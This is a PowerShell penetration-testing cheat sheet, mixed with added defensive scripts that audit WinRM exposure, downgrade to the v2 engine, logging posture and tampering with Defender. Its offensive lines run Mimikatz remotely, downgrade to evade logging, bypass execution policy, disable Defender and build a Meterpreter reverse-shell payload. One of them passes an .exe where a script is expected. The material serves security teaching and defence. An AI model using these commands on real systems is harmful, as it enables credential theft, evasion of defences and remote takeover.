# PowerShell

### Basic Usage

#### Creating a PowerShell Session

**Background:** We can establish a persistent connection in PowerShell using `New-PSSession` and `Enter-PSSession`. This can make life significantly easier and reduce overhead, because one authenticated WinRM session is reused for every subsequent command.

```powershell
# Open a remoting session and keep the session object for later reuse.
$s = New-PSSession -ComputerName [IP] -Credential [USER]
Enter-PSSession -Session $s
```

#### Executing Scripts Remotely

**Background:** We can execute scripts remotely with PowerShell by passing an existing session to `Invoke-Command`.

```powershell
# -FilePath takes a path on the LOCAL machine; the script's contents are read
# locally and executed inside the remote session ($s from New-PSSession above).
Invoke-Command -Session $s -FilePath C:\Users\Parzival\Desktop\Mimikatz.exe
```
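The two commands above ride on WinRM. The following audit script is an added example, not code from the original page: it reports how exposed a host is to PowerShell remoting (service state, listeners, the `TrustedHosts` client setting, and who is permitted to connect to each session configuration). It assumes a standard Windows installation with the `WSMan:` drive available and should be run from an elevated prompt; the function name is this example's own.

```powershell
# Added example: audit PowerShell remoting exposure on the local host.
# Assumes the WinRM service and the WSMan: provider exist (standard on Windows).
function Get-RemotingExposure {
    $result = [ordered]@{}

    # Remoting needs the WinRM service; if it is stopped, no listener is reachable.
    $svc = Get-Service -Name WinRM -ErrorAction SilentlyContinue
    $result.WinRMRunning = [bool]($svc -and $svc.Status -eq 'Running')

    # Enumerate listeners: transport (HTTP/HTTPS), bound address and port.
    $result.Listeners = @()
    if ($result.WinRMRunning) {
        $result.Listeners = @(Get-ChildItem -Path WSMan:\localhost\Listener -ErrorAction SilentlyContinue |
            ForEach-Object {
                $props = Get-ChildItem -Path $_.PSPath
                [pscustomobject]@{
                    Transport = ($props | Where-Object Name -eq 'Transport').Value
                    Address   = ($props | Where-Object Name -eq 'Address').Value
                    Port      = ($props | Where-Object Name -eq 'Port').Value
                }
            })
    }

    # TrustedHosts = '*' makes this machine, as a CLIENT, willing to send
    # credentials to any host name, including a spoofed one.
    $trusted = Get-Item -Path WSMan:\localhost\Client\TrustedHosts -ErrorAction SilentlyContinue
    $result.TrustedHosts = if ($trusted) { $trusted.Value } else { '' }
    $result.TrustedHostsWildcard = ($result.TrustedHosts -eq '*')

    # Which principals may connect to each session configuration.
    # Get-PSSessionConfiguration requires elevation; errors are suppressed otherwise.
    $result.SessionConfigs = @(Get-PSSessionConfiguration -ErrorAction SilentlyContinue |
        Select-Object Name, Permission)

    [pscustomobject]$result
}

$audit = Get-RemotingExposure
$audit | Format-List
if ($audit.TrustedHostsWildcard) {
    Write-Warning 'TrustedHosts is "*": this client will authenticate to any remote host name.'
}
if ($audit.Listeners | Where-Object Transport -eq 'HTTP') {
    Write-Warning 'An HTTP listener is enabled; prefer HTTPS or restrict the listener address.'
}
```

The `Permission` column of `Get-PSSessionConfiguration` is the part worth reviewing in practice: any group listed there with `AccessAllowed` can open the sessions described above, so membership of those groups should be as small as the built-in Remote Management Users group is meant to be.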

### Enumeration

#### Enumerate Installed Versions

**Background:** This can be helpful when determining if a PowerShell downgrade attack will work.

```powershell
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\PowerShell\*\PowerShellEngine -Name PowerShellVersion).PowerShellVersion
```

This is important because, if the PowerShell 2.0 engine is installed, we can launch it and thereby bypass multiple security protections that are only present in the more recent PowerShell 5 releases:

```powershell
powershell.exe -Version 2
```
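From the defender's side, the question is whether the 2.0 engine is still installed and whether anyone has started it. The script below is an added example, not code from the original page: it lists the registered engines using the same registry location as the one-liner above, checks the optional-feature state where that cmdlet is available, and searches the `Windows PowerShell` log for engine-start events (Event ID 400) that report `EngineVersion=2.0`. The registry paths, feature name and event format are Microsoft's; the function names are this example's own.

```powershell
# Added example: detect the presence and use of the legacy PowerShell 2.0 engine.
# Assumes a standard Windows registry layout and the 'Windows PowerShell' event log.
function Get-PSEngineVersions {
    # Engines register under HKLM:\SOFTWARE\Microsoft\PowerShell\<n>\PowerShellEngine
    # ('1' holds the v2 engine, '3' the v3+ engine).
    Get-ChildItem -Path 'HKLM:\SOFTWARE\Microsoft\PowerShell' -ErrorAction SilentlyContinue |
        ForEach-Object {
            $engine = Get-ItemProperty -Path "$($_.PSPath)\PowerShellEngine" -ErrorAction SilentlyContinue
            if ($engine) {
                [pscustomobject]@{
                    Key            = $_.PSChildName
                    EngineVersion  = $engine.PowerShellVersion
                    RuntimeVersion = $engine.RuntimeVersion
                }
            }
        }
}

function Test-V2EngineInstalled {
    $fromRegistry = [bool](Get-PSEngineVersions | Where-Object { $_.EngineVersion -like '2.*' })
    # On Windows 8 / Server 2012 and later the v2 engine is an optional feature whose
    # state is authoritative (the cmdlet needs elevation; fall back to the registry otherwise).
    $feature = Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -ErrorAction SilentlyContinue
    if ($feature) { return ($feature.State -eq 'Enabled') }
    $fromRegistry
}

function Get-V2EngineStarts {
    param([int]$MaxEvents = 500)
    # Event ID 400 is written on every engine start; its message carries
    # EngineVersion=<version> and HostApplication=<command line>. A 2.0 entry on a
    # host whose default engine is 5.x is a downgrade indicator.
    Get-WinEvent -LogName 'Windows PowerShell' -FilterXPath '*[System[EventID=400]]' `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'EngineVersion=2\.0' } |
        Select-Object TimeCreated, Id, @{ n = 'HostApplication'; e = {
            ($_.Message -split '\r?\n' | Where-Object { $_ -match 'HostApplication=' }) -replace '.*HostApplication=', ''
        } }
}

Get-PSEngineVersions | Format-Table -AutoSize
if (Test-V2EngineInstalled) {
    Write-Warning 'PowerShell 2.0 engine is present: a downgrade to an engine without script block logging or AMSI is possible.'
    Get-V2EngineStarts | Format-Table -AutoSize
    # Remediation: remove the optional feature. Shown with -WhatIf so the audit changes nothing.
    Disable-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2Root -WhatIf
}
```

Note that the 2.0 engine also needs the .NET Framework 3.5 (CLR 2.0) to actually start, so `powershell.exe -Version 2` fails on hosts where that framework was never installed even if the engine key is still registered; the Event ID 400 search is the reliable way to tell whether a downgrade has happened rather than merely been possible.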

### Offensive PowerShell

#### Bypassing Execution Policy

**Information:** The execution policy can be bypassed in multiple ways. It is not a security boundary and will not prevent unsigned scripts from being run.

```powershell
# Start a new process with the policy set to Bypass
powershell.exe -exec bypass
# Or change it for the current process only (no admin rights needed)
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
```
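Because the execution policy is a safety check rather than a security control, the question for a defender is whether what PowerShell runs gets recorded and whether untrusted scripts run in a constrained language mode. The audit below is an added example, not code from the original page: it reads the Group Policy registry values Microsoft documents for script block logging, module logging and transcription, and reports the current execution policy and language mode. The registry paths and value names are Microsoft's; the function names are this example's own.

```powershell
# Added example: audit the PowerShell logging and language-mode posture of this host.
# Assumes the Microsoft-documented policy keys under
# HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell (absent when no policy is applied).
function Get-PSLoggingPosture {
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Read one policy value; $null means the key or value does not exist (policy not set).
    function Read-Policy([string]$SubKey, [string]$Name) {
        $item = Get-ItemProperty -Path (Join-Path $base $SubKey) -Name $Name -ErrorAction SilentlyContinue
        if ($item) { $item.$Name } else { $null }
    }

    [pscustomobject]@{
        # The effective policy for this process: the value the bypass commands above override.
        ExecutionPolicy           = Get-ExecutionPolicy
        # ConstrainedLanguage blocks most .NET/COM access from untrusted scripts; FullLanguage is the default.
        LanguageMode              = $ExecutionContext.SessionState.LanguageMode
        # 1 = every script block is logged to Microsoft-Windows-PowerShell/Operational as event 4104.
        ScriptBlockLogging        = Read-Policy 'ScriptBlockLogging' 'EnableScriptBlockLogging'
        # 1 = pipeline execution details for the configured modules are logged (event 4103).
        ModuleLogging             = Read-Policy 'ModuleLogging' 'EnableModuleLogging'
        # 1 = full session transcripts are written to the configured output directory.
        Transcription             = Read-Policy 'Transcription' 'EnableTranscripting'
        TranscriptOutputDirectory = Read-Policy 'Transcription' 'OutputDirectory'
    }
}

$posture = Get-PSLoggingPosture
$posture | Format-List
if ($posture.ScriptBlockLogging -ne 1) {
    Write-Warning 'Script block logging is not enabled by policy: scripts started with -exec bypass leave no 4104 record.'
}
if ($posture.LanguageMode -eq 'FullLanguage') {
    Write-Warning 'Session runs in FullLanguage mode; an application control policy (AppLocker/WDAC) is needed to enforce ConstrainedLanguage.'
}
```

Even with script block logging switched off, PowerShell 5 still logs blocks containing a built-in list of suspicious terms at Warning level, so a `4104` search is worthwhile on any host; enabling the policy simply makes that record complete.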

#### Bypassing Real-time Monitoring

```powershell
# Both require local administrator rights and are silently ignored when
# Defender Tamper Protection is enabled.
powershell Set-MpPreference -DisableRealtimeMonitoring $true
powershell Set-MpPreference -DisableIOAVProtection $true
```
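The settings the two commands above change are readable back through the same Defender module, and Defender writes an event each time real-time protection is turned off. The script below is an added example, not code from the original page: it reports the current state of the two preferences, whether Tamper Protection would have blocked the change, and any recent disable events (IDs 5001 and 5004) from the `Microsoft-Windows-Windows Defender/Operational` log. The cmdlets, properties and event IDs are Microsoft's; the function name and the seven-day lookback are this example's own.

```powershell
# Added example: detect tampering with Defender real-time protection.
# Assumes the Defender PowerShell module and its Operational event log are present.
function Get-DefenderTamperingState {
    param([int]$LookbackDays = 7)

    $pref   = Get-MpPreference -ErrorAction Stop
    $status = Get-MpComputerStatus -ErrorAction Stop

    # 5001 = "Real-time protection is disabled"
    # 5004 = real-time protection feature configuration has changed
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 5004
        StartTime = (Get-Date).AddDays(-$LookbackDays)
    } -ErrorAction SilentlyContinue

    [pscustomobject]@{
        RealtimeMonitoringDisabled = [bool]$pref.DisableRealtimeMonitoring
        IOAVProtectionDisabled     = [bool]$pref.DisableIOAVProtection
        RealTimeProtectionEnabled  = $status.RealTimeProtectionEnabled
        TamperProtected            = $status.IsTamperProtected
        RecentDisableEvents        = @($events | Select-Object TimeCreated, Id,
            @{ n = 'Summary'; e = { ($_.Message -split '\r?\n')[0] } })
    }
}

$state = Get-DefenderTamperingState
$state | Format-List
if (-not $state.TamperProtected) {
    Write-Warning 'Tamper Protection is off: any local administrator can disable real-time monitoring with one Set-MpPreference call.'
}
if ($state.RealtimeMonitoringDisabled -or -not $state.RealTimeProtectionEnabled) {
    Write-Warning 'Real-time monitoring is currently disabled; correlate the 5001/5004 events above with the user session that made the change.'
}
```

Forwarding events 5001 and 5004 to a central log is the cheap detection here: the commands on this page produce them on every host where the change actually took effect, and their absence on a host reporting `RealtimeMonitoringDisabled` is itself worth investigating.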

#### Meterpreter Shell

```bash
msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=$ip LPORT=$port
```
